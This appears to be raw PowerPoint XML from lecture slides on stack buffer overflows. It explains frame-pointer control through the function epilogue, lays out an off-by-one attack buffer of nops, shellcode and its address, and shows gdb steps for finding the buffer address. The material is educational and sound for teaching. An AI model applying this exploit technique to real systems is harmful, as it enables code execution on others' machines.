      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1118234" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1118226" idx="1"/>
            <a:endCxn id="1118223" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="485775"/>
            <a:ext cx="1588" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70100005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1118235" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1118225" idx="1"/>
            <a:endCxn id="1118224" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="942975"/>
            <a:ext cx="1588" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39500005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118236"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8237" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4400550"/>
            <a:ext cx="2209800" cy="584776"/>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main: return 0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118238" name="Rectangle 30"/>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8241" name="Text Box 33"/>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3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
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22715626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9" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="14859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0260" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="28003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20261" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="30861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20262" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="33718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20263" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="4114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20264" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="4400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9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3898900" y="3733800"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1120266" name="Oval 10"/>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67" name="Oval 11"/>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68" name="Oval 12"/>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0269" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="25146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20270" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="16002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20271" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="18859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20272" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="16002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73" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="25146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74" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894660" y="19464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20275" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894660" y="34323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sp>
        <p:nvSpPr>
          <p:cNvPr id="1120276" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="28003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0277" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4876800" y="2514600"/>
            <a:ext cx="11430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600">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120278" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="2286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buffer[256]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120279" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflown Stack Before Returning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213940107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a:t>Tracking The Frame Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1122307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack pointer takes frame pointer’s value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we can control the frame pointer we can control the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack pointer is now (frame pointer + 4 bytes) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The saved program counter is popped from the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program counter becomes *(frame pointer + 4 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3773528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r>
              <a:rPr lang="en-US"/>
              <a:t>Exploiting an Off-by-one Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124355" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By modifying the value of the saved frame pointer it is possible to provide an arbitrary value for the new stack pointer, and, in turn, for the value to be popped into the program counter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be exploited to jump to attacker-supplied code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attack buffer is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nops</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lowest order byte of frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35934293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nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="1028700"/>
            <a:ext cx="2057400" cy="3657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6403" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2400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26404" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2971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26405" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="36576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26406" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="4400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nops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126407" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="4686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8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="3314700"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1126409" name="Oval 9"/>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0" name="Oval 10"/>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1" name="Oval 11"/>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6412" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="29718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26413" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="12001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26414" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="148590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26415" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="120015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6" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="2114550"/>
            <a:ext cx="152400" cy="2857500"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20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7" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894660" y="16035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26418" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894660" y="34323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sp>
        <p:nvSpPr>
          <p:cNvPr id="1126419" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="240030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6420" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4800600" y="2514600"/>
            <a:ext cx="1219200" cy="571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600">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126421" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="2286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ebp[3]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126422" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2686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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 23"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="4057650"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1126424" name="Oval 24"/>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25" name="Oval 25"/>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26" name="Oval 26"/>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6428" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Smashing the Frame Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2795334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r>
              <a:rPr lang="en-US"/>
              <a:t>Finding the Buffer Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1128451" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need to be able to determine the address of the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find stack pointer value (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) at start of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with debugger</a:t>
            </a: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disassemble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	Dump of assembler code for function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	0x8048134 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&gt;:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	0x8048135 &lt;func+1&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	0x8048137 &lt;func+3&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>   $0x104,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	0x804813d &lt;func+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRP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break *0x804813d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	Breakpoint 1 at 0x804813d</a:t>
            </a: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info register </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>            0xbffffc60       0xbffffc60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;buffer = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
